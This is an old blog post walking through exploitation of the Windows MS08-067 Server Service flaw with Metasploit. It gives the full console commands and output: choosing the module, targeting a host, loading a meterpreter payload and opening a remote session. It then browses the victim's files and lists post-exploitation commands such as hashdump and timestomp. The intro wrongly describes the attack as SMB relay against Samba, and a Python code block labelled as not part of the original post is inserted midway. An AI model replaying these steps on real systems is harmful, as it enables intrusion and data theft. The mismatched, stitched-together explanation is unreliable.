Wednesday, December 03, 2008

Universal Windows Exploit with Framework Tools - Metasploit and SMB Relay (hdm)

What is up with MS08-067? Here is the explanation …
This time I am trying to share with everyone how I applied the SMB relay client exploit method, attempting to access the SMB service, where an attacker can break into Samba if they are running Internet Explorer or Outlook Express.
This method was published by Sir Dystic during @tlantacon in 2001 and implemented in Metasploit in July 2007. That made me curious about how this exploit method is carried out, so here is the article I wrote.
Download the latest Metasploit framework, or visit http://www.metasploit.com

root@boc [~/metasploit]# wget http://spool.metasploit.com/releases/framework-3.2.tar.gz
root@boc [~/metasploit]# tar -zxvf framework-3.2.tar.gz
root@boc [~/metasploit]# cd framework-3.2
root@boc [~/metasploit/framework-3.2]# ./msfconsole

=[ msf v3.2-release
+ -- --=[ 320 exploits - 217 payloads
+ -- --=[ 20 encoders - 6 nops
=[ 99 aux



-) Show the commands
msf > help

Core Commands
=============

Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
exit Exit the console
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
load Load a framework plugin
loadpath Searches for and loads modules from a path
quit Exit the console
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
unload Unload a framework plugin
unset Unsets one or more variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the console library version number

Check the Metasploit version
msf > version
Framework: 3.2-release.5962
Console : 3.2-release.5773

Switch to the ms08_067 Samba exploit
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name
-- ----
0 Automatic Targeting
View the info for this exploit
msf exploit(ms08_067_netapi) > info windows/smb/ms08_067_netapi

Name: Microsoft Server Service Relative Path Stack Corruption
Version: 5888
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)

Provided by:
hdm
Brett Moore

Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP2 English (NO NX)
9 Windows 2003 SP2 English (NX)
10 Windows XP SP2 Arabic (NX)
11 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
12 Windows XP SP2 Chinese - Simplified (NX)
13 Windows XP SP2 Chinese - Traditional (NX)
14 Windows XP SP2 Czech (NX)
15 Windows XP SP2 Danish (NX)
16 Windows XP SP2 German (NX)
17 Windows XP SP2 Greek (NX)
18 Windows XP SP2 Spanish (NX)
19 Windows XP SP2 Finnish (NX)
20 Windows XP SP2 French (NX)
21 Windows XP SP2 Hebrew (NX)
22 Windows XP SP2 Hungarian (NX)
23 Windows XP SP2 Italian (NX)
24 Windows XP SP2 Japanese (NX)
25 Windows XP SP2 Korean (NX)
26 Windows XP SP2 Dutch (NX)
27 Windows XP SP2 Norwegian (NX)
28 Windows XP SP2 Polish (NX)
29 Windows XP SP2 Portuguese - Brazilian (NX)
30 Windows XP SP2 Portuguese (NX)
31 Windows XP SP2 Russian (NX)
32 Windows XP SP2 Swedish (NX)
33 Windows XP SP2 Turkish (NX)
34 Windows XP SP3 Arabic (NX)
35 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
36 Windows XP SP3 Chinese - Simplified (NX)
37 Windows XP SP3 Chinese - Traditional (NX)
38 Windows XP SP3 Czech (NX)
39 Windows XP SP3 Danish (NX)
40 Windows XP SP3 German (NX)
41 Windows XP SP3 Greek (NX)
42 Windows XP SP3 Spanish (NX)
43 Windows XP SP3 Finnish (NX)
44 Windows XP SP3 French (NX)
45 Windows XP SP3 Hebrew (NX)
46 Windows XP SP3 Hungarian (NX)
47 Windows XP SP3 Italian (NX)
48 Windows XP SP3 Japanese (NX)
49 Windows XP SP3 Korean (NX)
50 Windows XP SP3 Dutch (NX)
51 Windows XP SP3 Norwegian (NX)
52 Windows XP SP3 Polish (NX)
53 Windows XP SP3 Portuguese - Brazilian (NX)
54 Windows XP SP3 Portuguese (NX)
55 Windows XP SP3 Russian (NX)
56 Windows XP SP3 Swedish (NX)
57 Windows XP SP3 Turkish (NX)

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload information:
Space: 400
Avoid: 8 characters

Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
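The module description above names the root cause: a parsing flaw in path canonicalization. As an added example (not code from the original post, and not a reimplementation of NetAPI32.dll), here is a small Python model of the defensive property such a canonicalizer must have: a `..` segment may never climb above the root of the path. The function names `canonicalize` and `is_safe` and the sample paths are my own.

```python
"""Constructed model of bounded path canonicalization (added example).

This is NOT NetpwPathCanonicalize or any NetAPI32 code; it only shows
the invariant a path canonicalizer has to keep: '..' never walks past
the root of the buffer it is working on.
"""
from typing import List


class PathTraversalError(ValueError):
    """Raised when '..' would climb above the root of the path."""


def canonicalize(path: str) -> str:
    r"""Collapse '.' and '..' segments in a Windows-style path.

    Both '\' and '/' are accepted as separators, repeated separators are
    merged, and the result always uses '\'.  A '..' with nothing left to
    pop is an error instead of being silently dropped or walked past root.
    """
    segments: List[str] = []
    for seg in path.replace("/", "\\").split("\\"):
        if seg in ("", "."):
            continue  # empty (leading, trailing or doubled separator) or '.'
        if seg == "..":
            if not segments:
                # This is the bound the vulnerable code lacked: refuse
                # rather than step backwards before the start of the path.
                raise PathTraversalError(f"'..' escapes root in {path!r}")
            segments.pop()
            continue
        segments.append(seg)
    return "\\" + "\\".join(segments)


def is_safe(path: str) -> bool:
    """True when the path canonicalizes without leaving its root."""
    try:
        canonicalize(path)
    except PathTraversalError:
        return False
    return True


if __name__ == "__main__":
    # Constructed sample inputs, not data from the original post.
    for p in (r"\share\docs\..\pics\a.jpg", r"\share\..\..\windows\system32"):
        print(p, "->", canonicalize(p) if is_safe(p) else "REJECTED")
```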

*> interrupt
At this point I opened a shell on my box and ran nmap as shown below

root@boc [~]# nmap 10.11.21.29 -p 445
Starting Nmap 4.20 ( http://insecure.org ) at 2008-12-02 18:18 WIT
Interesting ports on 10.11.21.29:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:16:76:7C:BA:D7 (Intel)

*> next jump (back to Metasploit)

Set the target IP
msf exploit(ms08_067_netapi) > set RHOST 10.11.21.29
RHOST => 10.11.21.29


Choose the payload type
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
Choose the target OS (0 = automatic OS detection)
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.11.21.200:48769 -> 10.11.21.29:4444)
As seen above, we are in session 1 and have successfully got into one of the targets

View the directory
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd ..


meterpreter > d:
meterpreter > ls

Listing: D:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 $AVG8.VAULT$
100666/rw-rw-rw- 91315 fil Thu Jan 01 07:00:00 +0700 1970 2512920190_7b59712cac.jpg
40555/r-xr-xr-x 0 dir Thu Jan 01 07:00:00 +0700 1970 BOC
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 IDM
40555/r-xr-xr-x 0 dir Thu Jan 01 07:00:00 +0700 1970 MD
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 New Folder (2)
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 PALBOMS
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 PC GAMES
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 PEPES
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 RECYCLER
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 Rully.F
100666/rw-rw-rw- 5005997 fil Thu Jan 01 07:00:00 +0700 1970 SafariSetup.exe.part
100666/rw-rw-rw- 129 fil Thu Jan 01 07:00:00 +0700 1970 Shortcut to CD Drive.lnk
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 System Volume Information
100666/rw-rw-rw- 1786056 fil Thu Jan 01 07:00:00 +0700 1970 TTPODSKINS.sisx
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 Temp
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 Trik Internet Gratis
100666/rw-rw-rw- 84997 fil Thu Jan 01 07:00:00 +0700 1970 bendera.jpg
100666/rw-rw-rw- 22911 fil Thu Jan 01 07:00:00 +0700 1970 bitie.txt
100666/rw-rw-rw- 2828444 fil Thu Jan 01 07:00:00 +0700 1970 dd8a672b68c207a0ff02f90a272e76e2.rar
100666/rw-rw-rw- 4107 fil Thu Jan 01 07:00:00 +0700 1970 image001.jpg
100666/rw-rw-rw- 39901 fil Thu Jan 01 07:00:00 +0700 1970 indah.jpg
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 indh
100666/rw-rw-rw- 221867 fil Thu Jan 01 07:00:00 +0700 1970 indonesia1.jpg
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 kriss
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 mustofa
100666/rw-rw-rw- 908 fil Thu Jan 01 07:00:00 +0700 1970 permintaan dephub aly hasny.txt
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 sri_numpang_mas
100666/rw-rw-rw- 37504 fil Thu Jan 01 07:00:00 +0700 1970 viewphotos.php.htm
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 viewphotos.php_files
40555/r-xr-xr-x 0 dir Thu Jan 01 07:00:00 +0700 1970 zul99umb

meterpreter > help

Core Commands
=============

Command Description
------- -----------
? Help menu
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel


Stdapi: File system Commands
============================

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rmdir Remove directory
upload Upload a file or directory


Stdapi: Networking Commands
===========================

Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table


Stdapi: System Commands
=======================

Command Description
------- -----------
execute Execute a command
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shutdown Shuts down the remote computer
sysinfo Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

Command Description
------- -----------
idletime Returns the number of seconds the remote user has been idle
uictl Control some of the user interface components


Priv: Password database Commands
================================

Command Description
------- -----------
hashdump Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

Command Description
------- -----------
timestomp Manipulate file MACE attributes

View the target's operating system
meterpreter > sysinfo
Computer: BOC-BOM
OS : Windows XP (Build 2600, Service Pack 2).
View the IP on the Windows target
meterpreter > ipconfig
Intel(R) PRO/100 VE Network Connection - Packet Scheduler Miniport
Hardware MAC: 00:16:76:7c:ba:d7
IP Address : 10.11.21.29
Netmask : 255.255.255.0
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

meterpreter > exit

[*] Meterpreter session 1 closed.
msf exploit(ms08_067_netapi) > exit
root@boc [~/metasploit/framework-3.2]# exit
logout

References:
www.metasploit.com
www.milw0rm.com
Patch your system now:
http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
Thanks to: Allah SWT, my great parents, all staff and members of www.sekuritionline.net, www.newhack.org
See my blog: www.inetholic.tk, thesims - iqbal@sekuritionline.net
